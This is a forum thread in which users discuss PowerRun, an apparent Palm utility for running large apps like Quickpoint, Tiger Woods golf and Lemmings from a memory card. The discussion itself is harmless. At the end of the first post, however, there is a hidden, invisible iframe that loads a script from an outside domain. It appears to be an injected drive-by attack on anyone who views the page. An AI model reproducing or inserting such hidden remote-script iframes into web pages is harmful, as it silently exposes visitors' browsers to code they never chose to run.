+ Reply to Thread

Thread: PowerRun

PowerRun

I've been using PowerRun for a long time now and it is quite nice for programs which require all of its elements loaded in memory to execute. I recently upgraded to Quickoffice Premier and Powerrun nicely launches Quickpoint (which I will rarely use) from the card. Has anyone used it successfully with other large programs like Blazer, Quicksheet, Quickword, or Xiino?

Verdict?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: PowerRun

Originally posted by Beryl
    I've been using PowerRun for a long time now and it is quite nice for programs which require all of its elements loaded in memory to execute. I recently upgraded to Quickoffice Premier and Powerrun nicely launches Quickpoint (which I will rarely use) from the card. Has anyone used it successfully with other large programs like Blazer, Quicksheet, Quickword, or Xiino?

Verdict?
    It looks nice Beryl. If an app runs from the card (like QuickPoint in your case) can you still put the icon to launch the app anywhere you want within the launcher?
    Please visit my picture site: Robert-O-Rama :)

Tiger Woods golf and Lemmings both need power run to work (or an equivelent). I love it. Just those two games alone and the courses take up 2MB!!

@ Robert
    Yep, that is one of advantages. Pretty slick.

@ Hotsync
    2mb? Woah!

Originally posted by HoTSynC
    Tiger Woods golf and Lemmings both need power run to work (or an equivelent). I love it. Just those two games alone and the courses take up 2MB!!
    I've lost track....... has the Tiger Woods game been updated since it first came out way back? Is it color now? I'll have to check that out. And I would play lemmings too (had it for forever) if I could remember how to play it without having to think too much (I used to play it on the computer a lot a long time ago).

Thanks for the tips Sounds like an app I need to have! (since there are so many apps I "need" to have )
    Please visit my picture site: Robert-O-Rama :)